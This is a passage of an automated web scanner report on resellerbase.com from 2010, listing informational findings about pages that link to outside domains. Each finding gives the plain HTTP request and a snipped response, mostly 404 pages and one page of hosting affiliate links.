<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.364. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.365. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.366. http://www.resellerbase.com/web-service/software-scripts/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.367. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.368. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.369. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.370. http://www.resellerbase.com/web-service/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.371. http://www.resellerbase.com/web-service/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.372. http://www.resellerbase.com/web-service/web-hosting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.373. http://www.resellerbase.com/web-service/web-hosting/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/googlepr.php?link_id=7

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/web-hosting/googlepr.php?link_id=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.374. http://www.resellerbase.com/web-service/web-hosting/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://reseller.targetdomain.com/
http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase
http://validator.w3.org/check?uri=referer
http://www.dograecorp.com/
http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase
http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase
http://www.myresellerpanel.com/
http://www.proxyonline.info/
http://www.resellerclub.com/

Request

GET /web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:47:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 50692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase" name="link_12"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase" name="link_12"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.proxyonline.info" name="link_7"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.proxyonline.info" name="link_7"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://reseller.targetdomain.com" name="link_4"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://reseller.targetdomain.com" name="link_4"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.resellerclub.com" name="link_17"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.resellerclub.com" name="link_17"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.375. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.376. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.377. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.378. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.379. http://www.resellerbase.com/web-service/web-hosting/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

